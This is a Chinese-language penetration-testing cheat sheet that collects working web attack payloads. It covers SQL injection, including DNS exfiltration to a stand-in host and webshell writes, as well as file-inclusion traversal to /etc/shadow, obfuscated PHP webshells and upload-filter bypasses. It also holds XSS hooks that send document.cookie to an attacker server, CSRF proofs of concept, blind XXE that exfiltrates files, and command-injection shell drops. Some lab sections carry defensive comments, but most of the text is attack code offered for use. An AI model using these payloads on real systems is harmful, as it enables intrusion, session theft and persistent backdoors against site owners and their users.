渗透测试-20:Payload 总结
SQL注入
通用
select user(),version(),database()
select group_concat(schema_name) from information_schema.schemata
select group_concat(table_name) from information_schema.tables where table_schema=database()
select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='表名'
判断
// 字符型
?id=1xxx # 源码为 id='1xxx', 正常
?id=1' and '1'='1 # 源码为 id='1' and '1'='1', 有回显
?id=1' and '1'='2 # 源码为 id='1' and '1'='2', 无回显
// 数字型
?id=1xxx # 源码为 id=1xxx, 报错
?id=1 and 1=1 # 源码为 id=1 and 1=1, 有回显
?id=1 and 1=2 # 源码为 id=1 and 1=2, 无回显
// 列数
1' ORDER BY 3--+
1' GROUP BY 3--+
1' union select @,@,@--+
注入
// 搜索框
1' and 1=1 and '%'='
%' and 1=1--'
%' and 1=1 and '%'='
// 报错,DML常用
' or updatexml(CHAR(126),(注入点),0x7e),null) or '
?id=1' and updatexml(null,concat(CHAR(126),(注入点),0x7e),null) --+
' or extractvalue(null,concat(CHAR(126),(注入点),0x7e)) or '
?id=1' and extractvalue(null,concat(CHAR(126),(注入点),0x7e)) --+
?id=1' union select 1, count(*), concat((注入点),0x7e,floor(rand(14)*2)) as x from 表名 group by x --+
// 布尔盲注
and (select count(*) from information_schma.tables where table_schema=database())>5 --+
and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>5 --+
and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 --+
// 时间盲注
and if((select count(*) from information_schema.schemata)>5,1,sleep(5)) --+
and if((select length(schema_name) from information_schema.schemata limit 0,1)>5,1,sleep(5)) --+
and if((select ascii(substr(schema_name,1,1)) from information_schema.schemata limit 0,1)>97,1,sleep(5)) --+
// 二次注入
流程:注册用户名 admin' # => 登录 admin' # => 修改密码导致 admin 密码被改
// 二次编码
1%2527 and 0 --+
// 宽字节
%df%27 or 1=1 --+
// Out of band
select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt'
select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt'
// DNSLog
?id=1' and (select load_file(concat('\\\\',(注入点),'.xxxxx.dnslog.cn/abc'))) --+
?id=1' and (select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'))) --+
?id=1' and (select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874))) --+
// 写shell
[...] union select 1,2,"<?php @eval($_POST['cmd']);?>" into outfile "C:/Program Files/ToolBoxs/PhpStudy/PHPTutorial/WWW/shell.php"
[...] UNION SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
[...] UNION SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>'
[...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'
[...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
[...] UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPFILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
[...] UNION SELECT 0x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e INTO DUMPFILE '/var/www/html/images/shell.php';
绕过
?id=-1 UNiOn SelEcT 1,2,3;%00
/*!11111select version()*/
select * from users where id=8E0union select 1,2,3
?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23
Select substr(database() from 1 for 1)
Select mid(database() from 1 for 1)
select * from news limit 1 offset 0
select user() like 'r%'
or 'swords'='sw'+'ords';EXEC('IN'+'SERT INTO'+'')
select%0a*%0afrom%0ausers;
select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64
select strcmp(left(database(),1),0x32)
?id=?id=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 or 1 --+
?id=-1 union selselectect 1,2,3 --+
?id=1&id=-1'
?id=-1 union %2573%65%6c%65%63%74 1,2,database()
?id=1") union/*!88888xxxxx*/%23%0aselect 1,2,3 --+
?id=1") order/*!88888xxxxx*/by 3 --+
?id=") group by 3 --+
?id=--1' union select 1,2,group_concat(key.key) from /*sql-yunsuo*/.key --+
?id=/*-1' union select 1,2,3 --+
?id=/*' union select 1,2,(select/**/`key` from `key`)--+`
?id=1'/*xxxxxxxx*/order/*xxxxxxxx*/by 3 --+
?id=10000'/*xxxxxxxx*/%23%0aunion%23%0a/*xxxxxxxx*/select 1,database/*xxxxxxxx*/(),group_concat(/*xxxxxxxx*/user.key/*xxxxxxxx*/from database.user) --+
等价替换
0x7573657273 => "users"
%6f%72%20%31%3d%31 => or 1=1
char(0x67)+char(0x75)+char(0x65)+char(0x73)+char(0x74) => "guest"
hex() bin() => ascii()
sleep(3) => benchmark(200000000,encode('a','b'))
concat_ws() => group_concat()
json_arrayagg() => group_concat() (MySQL >= 5.7.22)
mid() substr() => substring()
@@user => user()
@@datadir => datadir()
like => =
group by 1 => order by 1
+ => 空格
0x3a => :
0x3c62723e => <br>
%23%0a = 注释换行
and => &&
or => ||
xor => |
not => !
() => 空格
+ => 空格
%0a => 空格
%a0 => 空格
tab => 空格
空格空格 => 空格
/* */ => 空格
/*!88888xxxxxx*/ => 空格
// -- /* */ # --+ --- ;%00 --a /*!表示不注释*/ /*!88888当数字大于mysql版本时算注释*/
文件包含
常见的敏感信息路径
Windows
// 查看系统版本
c:\boot.ini
// IIS配置文件
c:\windows\system32\inetsrv\MetaBase.xml
// 存储Windows系统初次安装的密码
c:\windows\repair\sam
// MySQL配置
c:\ProgramFiles\mysql\my.ini
// MySQL root密码
c:\ProgramFiles\mysql\data\mysql\user.MYD
// php 配置信息
c:\windows\php.ini
Linux/Unix
// 账户信息
/etc/passwd
// 账户密码文件
/etc/shadow
// Apache2默认配置文件
/usr/local/app/apache2/conf/httpd.conf
// 虚拟网站配置
/usr/local/app/apache2/conf/extra/httpd-vhost.conf
// PHP相关配置
/usr/local/app/php5/lib/php.ini
// Apache配置文件
/etc/httpd/conf/httpd.conf
// mysql 配置文件
/etc/my.conf
其他
可以通过 phpinfo() 中的 session.save_path 查看 session 的存储位置,默认为 /var/lib/php/session
payload
php?filename=../../../../../../../boot.ini%00
// Windows下目录最大长度为256字节,超出的部分会被丢弃;
// Linux下目录最大长度为4096字节,超出的部分会被丢弃。
php?filename=test.txt/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
php?filename=test.txt.................................................................................................................................................................................................................................................................................................................................................
// 伪协议
php?filename=http://192.168.91.133/FI/php.txt
php?filename=http://192.168.91.133/FI/php.txt%3f (?)
php?filename=http://192.168.91.133/FI/php.txt%23 (#)
php?filename=http://192.168.91.133/FI/php.txt%20 ( )
php?filename=php://filter/convert.base64-encode/resource=xxx.php
php?filename=php://filter/read=convert.base64-encode/resource=xxx.php
php?filename=php://input post => <?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>
php?filename=file://c:/boot.ini
php?filename=data://text/plain;base64;PD9waHAgcGhwaW5mbygpOw==
// 将shell.php用zip协议打成压缩包,并将压缩包命名为shell.png
php?filename=phar://shell.png/shell.php post => cmd=phpinfo();
php?filename=zip://shell.png%23shell.php post => cmd=phpinfo();
文件上传
php写shell
// FILE_APPEND 如果文件 filename 已经存在,追加数据而不是覆盖。LOCK_EX 在写入时获得一个独占锁。
file_put_contents("xxx.php", '<?php @eval($_POST["cmd"]?>', FILE_APPEND | LOCK_EX);
fwrite(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');
fputs(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');
绕马
<?php asset($_POST["cmd"]);?>
<?php $_POST["a"]($_POST["b"]);?> post => a=assert&b=phpinfo()
<?php $a = substr_replace("assxxx","ert",3);$a($_POST["cmd"]);?>
<?php function test($a){$a($_POST["cmd"]);} test("assert");?>
<?php function test($func,$param){return $func($param);} test("assert",$_POST["cmd"]);?>
<?php call_user_func($_POST["a"],$_POST["b"]);?> post => a=assert&b=phpinfo()
<?php forward_static_call_array("assert",array($_POST["cmd"]));?>
<?php $a=base64_decode($_POST["cmd"]);assert($a);?>
<?php $a = base64_decode("YXNzZXJ0");$a($_POST["cmd"]);?>
<?php $a = ("!"^"@")."ssert";$a($_POST["cmd"]);?>
<?php $_ = ("$"^"{}").("~"^".").("/"^"`").("-"^"~").("("^"|");${$_}["a"](${$_}["b"]);?>
<?php $a = chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);$a(${chr(95).chr(80).chr(79).chr(83).chr(84)}[chr(34).chr(99).chr(109).chr(100).chr(34)]);?>
<?php class Test{var $a;var $b;function __construct($a, $b) {$this->a = $a;$this->b = $b;}function demo() {array_map($this->a,$this->b);}} $t = new Test("assert",array($_POST["cmd"]));$t->demo();?>
// 在线转换地址:https://www.toolfk.com/tools/convert-php.html
// 原始
<?php @eval($_POST['cmd']);?>
// 加密
<?php $O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O = $O00OO0{
3} . $O00OO0{
6} . $O00OO0{
33} . $O00OO0{
30};
$O0OO00 = $O00OO0{
33} . $O00OO0{
10} . $O00OO0{
24} . $O00OO0{
10} . $O00OO0{
24};
$OO0O00 = $O0OO00{
0} . $O00OO0{
18} . $O00OO0{
3} . $O0OO00{
0}
. $O0OO00{
1} . $O00OO0{
24};
$OO0000 = $O00OO0{
7} . $O00OO0{
13};
$O00O0O .= $O00OO0{
22} . $O00OO0{
36}
. $O00OO0{
29} . $O00OO0{
26} . $O00OO0{
30} . $O00OO0{
32} . $O00OO0{
35} . $O00OO0{
26} . $O00OO0{
30};
eval($O00O0O("JE8wTzAwMD0iSlhLaUNzSFRCenRFZ2t1UFJuVWxxV29lYnlORFZ4ckZPdmpMcEFhU21jd2ZkUWhHWllJTVFsbXlIRnZTR3hrVXBoc1p0UEJxb0t1TkVpblJ6SmZBY3dDVGpYTURkZ0xyWVdWYmFlSU9aUjlMTXZYcFdiejJlS0x1UUE5V1MxbkJLaVlDRUtXUGxEaDdaeDQ9IjsgIAogICAgICAgIGV2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksICAgIAogICAgICAgICRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
?>
// 混淆
<?php function EDnRK($kYsyl)
{
$kYsyl = gzinflate(base64_decode($kYsyl));
for ($i = 0; $i < strlen($kYsyl); $i++) {
$kYsyl[$i] = chr(ord($kYsyl[$i]) - 1);
}
return $kYsyl;
}
eval(EDnRK("U1QEAce08qRcTdWEwICQ0BiNlLxUjTgtGwd7AA=="));
?>
改包绕过
Content-Type: image/jpeg
// 先上传 .htaccess 文件,允许解析当前目录的 .jpg 文件,.htaccess 文件写入如下内容
SetHandler application/x-httpd-php
Content-Disposition: filename="shell.phtml"
Content-Disposition: filename="shell.php.xxx"
Content-Disposition: filename="shell.pHP"
Content-Disposition: filename="shell.php "
Content-Disposition: filename="shell.php."
Content-Disposition: filename="shell.php::$DATA"
Content-Disposition: filename="shell.php::$DA::$DATATA"
Content-Disposition: filename="shell.php. ."
Content-Disposition: filename="shell.pphphp"
Content-Disposition: filename="shell.php/."
// 修改一句话木马文件,在头部加上 GIF89a,将文件重命名为 .gif 后缀,再利用文件包含
?file=upload/4420220324224731.gif
// 00截断(GET)
POST /upload-labs/Pass-12/index.php?save_path=../upload/shell.php%00
Content-Disposition: filename="shell.jpg"
Content-Type: image/jpeg
// 00截断(POST)
Content-Disposition: filename="shell.jpg"
Content-Type: image/jpeg
在Hex中修改路径:../upload/ => ../upload/shell.php0 => ../upload/shell.php
// 二次渲染绕过,上传一个正常图片,然后下载下来与原来的图片做对比,用工具找到没有发生改变的地方,写入一句话,保存后再次上传
// 条件竞争绕过,先开启 python 请求脚本,再用 BurpSuite 爆破模块的 Null payloads 模式使用多线程一直发包上传一句话木马
// 7z后缀并不被Apache服务器所识别,却在上传文件名后缀的白名单中,可以利用Apache的解析漏洞将上传的7z后缀文件当做php文件解析
XSS
反射型
漏洞服务器
vul-page-reflected.php
<?php
// Intentionally vulnerable lab page for the reflected-XSS walkthrough; the
// injection points are kept so the exercise reproduces.
// Defensive reading: every echo of request data below is written as raw HTML.
// The fix in production code is output encoding at each sink
// (htmlspecialchars($v, ENT_QUOTES, 'UTF-8')) plus HttpOnly/SameSite flags on
// the session cookie so a successful injection cannot read document.cookie.
header('content-type:text/html;charset=utf-8');
session_start();
if (isset($_GET['action'])) {
$action = $_GET['action'];
// ?action=<script>alert(1)</script>
// SINK 1: the raw query parameter is reflected into the response body.
echo $action;
if ($action == 'logout') {
unset($_SESSION['name']);
echo '成功退出';
// NOTE(review): header() after echo only works while output buffering is on;
// with output_buffering=0 PHP warns "headers already sent" and the refresh is dropped.
header("refresh:1;url='./vul-page-reflected.php'");
} else {
header("refresh:1;url='./vul-page-reflected.php'");
}
} else {
if (isset($_SESSION['name'])) {
$name = $_SESSION['name'];
echo "<a href='./vul-page-reflected.php?action=logout'>退出</a><br>";
echo "欢迎 $name , 尊敬的vip 请留言!";
echo "<h3>请留言:</h3>";
echo "<form action='' method='post'>";
echo "<textarea cols=30 rows=5 name='message'></textarea><br>";
echo "<input type='submit' value='提交'></form>";
if (isset($_POST['message'])) {
// SINK 2: the POST body is reflected unescaped (this is the sink the
// POST-type demo form targets). No CSRF token protects this form either.
echo " $name 说: {$_POST['message']}";
}
} else if (isset($_POST['name']) && isset($_POST['passwd'])) {
$name = $_POST['name'];
$passwd = $_POST['passwd'];
// Hard-coded demo credentials compared with loose ==; real code would use
// password_verify() and call session_regenerate_id(true) after a successful
// login (nothing here rotates the session id, so fixation is possible).
if ($name == 'admin' && $passwd == '123456') {
$_SESSION['name'] = $name;
header('refresh:1;url="./vul-page-reflected.php"');
} else {
echo '账户或密码错误!';
header('refresh:1;url="./vul-page-reflected.php"');
}
} else {
echo "<h1>登录</h1>";
echo "<form action='' method='post'>";
echo "账户:<input type='text' name='name'><br>";
echo "密码:<input type='password' name='passwd'><br>";
echo "<input type='submit' value='ok'></form>";
}
}
模拟演示-GET型
攻击者服务器
/xss/cookie-get.php
<?php
// Lab collector endpoint: stores the `cookie` query parameter in cookie.txt.
// file_put_contents() without FILE_APPEND overwrites, so only the last hit is kept.
// Defence lives on the vulnerable site, not here: an HttpOnly session cookie is
// never exposed through document.cookie, and a CSP without this origin blocks the load.
$cookie = $_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
/xss/hook-get.js
// Lab hook loaded by the GET-type demo: sends document.cookie to the collector.
// `xmlhttp` is assigned without var/let, so it becomes an implicit global.
// Detection/mitigation: an outbound request carrying the session cookie to a
// foreign host; CSP `connect-src`/`script-src` and HttpOnly cookies stop it.
xmlhttp = new XMLHttpRequest();
xmlhttp.open(
"get",
"http://[攻击者服务器IP]/xss/cookie-get.php?cookie=" + document.cookie,
true // asynchronous request
);
xmlhttp.send();
钓鱼页面
xss-get.html
<!DOCTYPE html>
<!-- Lab lure page for the GET-type reflected-XSS demo. Both links point at the
     vulnerable page with a script in the query string; the bracketed values
     are placeholders for the lab hosts. -->
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>XSS-GET</title>
</head>
<body>
<!-- Variant 1: navigates the victim to the collector, passing document.cookie -->
<a
href="http://[漏洞服务器IP]/vul-page-reflected.php/?name=<script>document.location='http://[攻击者服务器IP]/xss/cookie-get.php?cookie='%2Bdocument.cookie</script>"
>点我有惊喜</a
>
<!-- Variant 2: loads hook-get.js, which posts the cookie asynchronously -->
<a
href="http://[漏洞服务器IP]/vul-page-reflected.php/?name=<script src='http://[攻击者服务器IP]/xss/hook-get.js'></script>"
>点我也有惊喜</a
>
</body>
</html>
模拟演示-POST型
攻击者服务器
/xss/cookie-post.php
<?php
// POST variant of the lab collector: reads `cookie` from the form body and
// overwrites cookie.txt (no FILE_APPEND, so earlier hits are lost).
$cookie = $_POST['cookie'];
file_put_contents('cookie.txt',$cookie);
/xss/hook-post.js
// Lab hook loaded by the POST-type demo: submits document.cookie as a
// form-encoded body instead of a query string. `xmlhttp` is an implicit global.
xmlhttp = new XMLHttpRequest();
xmlhttp.open(
"post",
"http://[攻击者服务器IP]/xss/cookie-post.php",
true // asynchronous request
);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("cookie=" + document.cookie);
钓鱼页面
xss-post.html
<!DOCTYPE html>
<!-- Lab lure page for the POST-type demo: a cross-site form whose hidden
     `message` field carries the script tag into the vulnerable page's
     unescaped echo of $_POST['message']. -->
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>XSS-POST</title>
</head>
<body>
<form action="http://[漏洞服务器IP]/vul-page-reflected.php" method="post">
<!-- Note the src has no scheme, so the browser resolves it relative to the page. -->
<input
type="hidden"
name="message"
value="<script src='[攻击者服务器IP]/xss/hook-post.js'></script>"
/>
<input type="submit" value="点我有惊喜" />
</form>
</body>
</html>
存储型
漏洞服务器
vul-page-stored.php
<?php
// Intentionally vulnerable stored-XSS lab page: the submitted comment is
// persisted to message.txt and replayed to every later visitor unescaped.
// Mitigation in real code: htmlspecialchars() at the echo below, and keep the
// data file outside the web root (message.txt sits next to the script here).
if (isset($_POST['message'])) {
$message = $_POST['message'];
// Overwrites the file each time (no FILE_APPEND), so only the newest comment is stored.
file_put_contents('message.txt', $message);
}
?>
<html>
<head>
<meta charset="utf-8">
<title>Stored XSS</title>
</head>
<body>
<form action="" method="post">
<!-- NOTE(review): the self-closing "/>" on textarea is followed by an explicit
     </textarea>; browsers tolerate it but it is not valid markup. -->
留下你的评论:<textarea cols="30" rows="5" name="message" /></textarea>
<input type="submit" value="提交">
</form>
<p>游客说:
<?php
if (file_exists('message.txt')) {
// SINK: stored user input is emitted as raw HTML.
echo file_get_contents('message.txt');
} else {
echo "暂无评论!";
}
?>
</p>
</body>
</html>
DOM型
漏洞服务器
vul-page-dom.php
<!DOCTYPE html>
<!-- Intentionally vulnerable DOM-XSS lab page: the server never sees the
     payload; the inline script reads it from the URL and writes it into the DOM. -->
<html lang="en">
<head>
<meta charset="UTF-8">
<title>DOM XSS</title>
</head>
<body>
<div>name:
<script>
if (document.location.href.indexOf("name=") >= 0) {
// Takes everything after the first "name=" (including any later parameters),
// then SINK: document.write() parses it as HTML.
// Mitigation: read via new URL(location).searchParams.get("name") and assign
// to textContent instead of document.write().
var name = document.location.href.substring(document.location.href.indexOf("name=") + 5);
document.write(decodeURI(name));
} else {
document.write('张三');
}
</script>
</div>
<form>
输入大名:<input name="name">
<input type="submit" value="ok">
</form>
</body>
</html>
payload
// 常规操作
<script>alert(1)</script>
<script src="http://[ip]/[my.js]"></script>
// src属性绕过
<img src=x onerror=alert(1)>
<img/src=x onerror=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
// iframe 绕过
<iframe src="javascript:alert(1)">
<iframe onload="alert(1)">
// a标签绕过
<a href="javascript:onclick=alert(1)">test</a>
<a href="javascript:alert(1)">test</a>
// script绕过
<scRiPt>alert(1)</scrIPt>
<scr<script>ipt>alert(1)</scr<script>ipt>
// 事件绕过
<svg onload=alert(1)>
<body onload=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">
// 圆括号绕过
<a onmouseover="javascript:window.onerror=alert;throw 1"></a>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
<script>alert`1`</script>
<img src=1 onerror=location="javascript:"+"aler"+"t%281%29">
// 在不需要任何用户交互的情况下执行脚本
<style onreadystatechange=alert(1)></style>
<iframe onreadystatechange=alert(1)></iframe>
<object onerror=alert(1)></object>
<img type=image src=valid.gif onreadystatechange=alert(1)>
<input type=image src=valid.gif onreadystatechange=alert(1)>
<body onbeforeactivate=alert(1)></body>
<video src=1 onerror=alert(1)></video>
<audio src=1 onerror=alert(1)>
// 伪协议
<object data=javascript:alert(1)></object>
<iframe src=javascript:alert(1)></iframe>
<event-source src=javascript:alert(1)></event-source>
// < 被转义 (点击事件绕过)
' onclick='alert(1)
" onclick="alert(1)
// script 被过滤,alert 被过滤 (换标签绕过)
<a onclick="alert(1)">test</a>
// < 被转义,script 被转义 (大小写绕过)
" ONclick="alert(1)
"><ScRiPt>alert(document.cookie)</ScRiPt>
// 编码绕过
"%3e%3cscript%3ealert(document.cookie)%3c/script%3e
// script 被过滤,< > 被转义 (双写绕过:绕过on)
" oonnclick="alert(1)
"><scr<script>ipt>alert(document.cookie)</scr</script>ipt>
<img o[%00]nerror=alert(1) src=a>
// script 被转义,< > 被转义 (伪协议绕过)
"><a href="javascript:alert(1)">test</a>"
// javascript 中的 i 被过滤 (HTML实体字符绕过)
javascript:alert(1)
<script>alert(1)</script>
// script、/、空格 被替换为 (换行绕过:%00 %09 %0d %0a)
<img%0Dsrc=x%0Donerror="alert(1)"/>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
// <input type="text" name="name" value="test-text" >
"><script>alert(1)</script>
// <script>var a='test-text'; var b=123;...</script>
'; alert(1); var foo='
// <a href="test-text">Click here</a>html
javascript:alert(1);
CSRF
钓鱼页面
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<!-- Lab PoC: a cross-site POST to change.php that is auto-submitted on load.
     It only works if the browser attaches the victim's session cookie to a
     cross-site POST: SameSite=Lax/Strict cookies, a per-session synchronizer
     token, or an Origin/Referer check on the server each defeat it. -->
<body>
<form
action="http://[漏洞服务器IP]/csrf-bank/change.php"
method="post"
id="csrf"
>
<input type="hidden" name="number" value="200" /><br />
<input type="hidden" name="name" value="hacker" /><br />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
// Auto-submit the form without user interaction.
document.getElementById("csrf").submit();
</script>
</html>
referer绕过
钓鱼页面
<!DOCTYPE html>
<!-- Lab lure for the "Referer bypass" case. The CSRF request is not sent from
     this page at all: the link injects a script into the reflected-XSS page on
     the vulnerable host, so the later request originates from that host and a
     Referer check passes. The real root cause is the XSS, not the CSRF check. -->
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>CSRF利用</title>
</head>
<body>
<a
id="demo"
href="http://[漏洞服务器IP]/dvwa/vulnerabilities/xss_r/?name=<scriPt src=http://[攻击者服务器IP]/csrf/hook.js></scriPt>"
>
点我有惊喜!
</a>
</body>
</html>
/csrf/hook.js
// Lab hook run inside the vulnerable origin (loaded via XSS), so the request is
// same-origin and carries the session cookie. Note the state change happens
// over GET — a design smell on the target side independent of CSRF tokens.
// `xmlhttp` is an implicit global.
xmlhttp = new XMLHttpRequest();
xmlhttp.open(
"get",
"http://[漏洞服务器IP]/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change"
);
xmlhttp.send();
token绕过
钓鱼页面
<!DOCTYPE html>
<!-- Lab lure for the "token bypass" case: the script is injected through the
     DOM-XSS page (payload in the URL fragment, so it never reaches the server
     log). Once script runs on the same origin it can read the anti-CSRF token,
     which is why a token alone cannot compensate for an XSS on that origin. -->
<html lang="en">
<head>
<meta charset="utf-8" />
<title>token类型CSRF</title>
</head>
<body>
<h1>token类型CSRF利用</h1>
<a
href="http://[漏洞服务器IP]/dvwa/vulnerabilities/xss_d/?default=Spanish#<script src=http://[攻击者服务器IP]/csrf/hook.js></script>"
>
点我有惊喜!
</a>
</body>
</html>
/csrf/hook.js
// Lab hook for the token-protected form. Runs from the vulnerable origin, so it
// can fetch the form page, read the token out of the HTML, and replay it.
// Both requests are synchronous (third open() argument is false), and the same
// xmlhttp object is reused for the second request; `count` stops the
// onreadystatechange handler from firing the replay again on that second response.
var url = "http://[漏洞服务器IP]/dvwa/vulnerabilities/csrf/";
if (window.XMLHttpRequest) {
xmlhttp = new XMLHttpRequest();
} else {
// Old Internet Explorer (IE5/IE6) used an ActiveX object instead
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
var count = 0;
xmlhttp.withCredentials = true;
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
var content = xmlhttp.responseText;
// The string is converted to a RegExp by String.prototype.match().
var pattern = "user_token' value='(.*?)'";
var match = content.match(pattern);
// match is null when the token field is absent, so match[1] would throw here.
var token = match[1];
var new_url =
"http://[漏洞服务器IP]/dvwa/vulnerabilities/csrf/?user_token=" +
token +
"&password_new=password&password_conf=password&Change=Change";
if (count == 0) {
count++;
xmlhttp.open("GET", new_url, false);
xmlhttp.send();
}
}
};
xmlhttp.open("GET", url, false);
xmlhttp.send();
SSRF
XXE
有回显
payload
<?xml version="1.0"?>
<!-- Classic in-band XXE: the external entity is expanded into the response.
     Mitigation on the parser side: disable external entity / DTD loading
     (in PHP, avoid LIBXML_NOENT and keep the entity loader disabled). -->
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
无回显
攻击者服务器
attack.dtd
<!-- External DTD for the blind (no-echo) lab case: the file is base64-encoded by
     the php://filter wrapper so it survives as a URL parameter, then pushed to the
     collector. Defence is the same parser hardening as the in-band case; an
     outbound request from the XML parser's host to a foreign URL is the
     detection signal. -->
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=[目标文件及路径]">
<!ENTITY % payload "<!ENTITY % getcontent SYSTEM 'http://[攻击者服务器IP]/xxe/getcontent.php?content=%file;'>">
%file;
%payload;
%getcontent;
getcontent.php
<?php
// Lab collector for the blind XXE case: decodes the base64 `content` parameter
// and overwrites xxe_results.txt (no FILE_APPEND, so only the last hit survives).
$content = $_GET['content'];
$content = base64_decode($content);
file_put_contents("xxe_results.txt", $content);
payload
<?xml version="1.0"?>
<!-- Blind XXE trigger: the document body is empty; all work happens when the
     parser fetches and evaluates the external DTD. -->
<!DOCTYPE root[
<!ENTITY % xxe SYSTEM "http://[攻击者服务器IP]/xxe/attack.dtd">
%xxe;
]>
CRE
代码执行
file_put_contents("xxx.php", '<?php @eval($_POST["cmd"]?>', FILE_APPEND | LOCK_EX);
fwrite(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');
fputs(fopen("xxx.php","a+"), '<?php @eval($_POST["cmd"]?>');
命令执行
|ls
|cat${IFS}key.ph*
|cat${IFS}key.ph?
|echo "<?php @eval(\$_POST['cmd']);?>" > shell.php
|cat shell.php
反序列化
访问控制符:public/protected/private
<?php
// Demonstrates PHP's serialize()/unserialize() format for public, protected
// and private properties. unserialize() on attacker-controlled input is the
// vulnerability class this section is about; real code should prefer
// json_decode() or pass ['allowed_classes' => false] (or an explicit list)
// to unserialize().
header("content-type:text/html;charset=utf-8;");
class People
{
public $name = "张三";
protected $age = 18;
private $money = 100.5;
// Constructor overwrites the three defaults.
public function __construct($name, $age, $money)
{
$this->name = $name;
$this->age = $age;
$this->money = $money;
}
// Prints the three properties; used below to show that unserialize() rebuilt them.
public function hello()
{
echo "My name is $this->name ,my age is $this->age ! ";
echo "I have $this->money RMB!";
}
}
$obj = new People("李四", 20, 175.5);
echo serialize($obj);
// O:6:"People":3:{s:4:"name";s:6:"李四";s:6:"*age";i:20;s:13:"Peoplemoney";d:175.5;}
// The lengths above reveal invisible bytes: "*age" is declared as 6 bytes and
// "Peoplemoney" as 13 because PHP wraps protected names as \0*\0age and
// private names as \0People\0money (NUL bytes, not shown by the browser).
// Uppercase "S:" below is the escaped-string form unserialize() accepts, where
// \00 is the hex escape for that NUL byte.
$str = 'O:6:"People":3:{s:4:"name";s:6:"王五";S:6:"\00*\00age";i:22;S:13:"\00People\00money";d:180.5;}';
$obj = unserialize($str);
$obj->hello();
// My name is 王五 ,my age is 22 !
// I have 180.5 RMB!
注意:
- 属性数量大于真实数量时,会绕过 __wakeup 方法
- protected 属性写成 S:6:"\00*\00age";,其中 \00 表示空格
- private 属性写成 S:13:"\00People\00money";,其中 People 是类名
数组:
a:1:{i:0;O:6:"readme":1:{s:6:"source";s:8:"flag.php";}}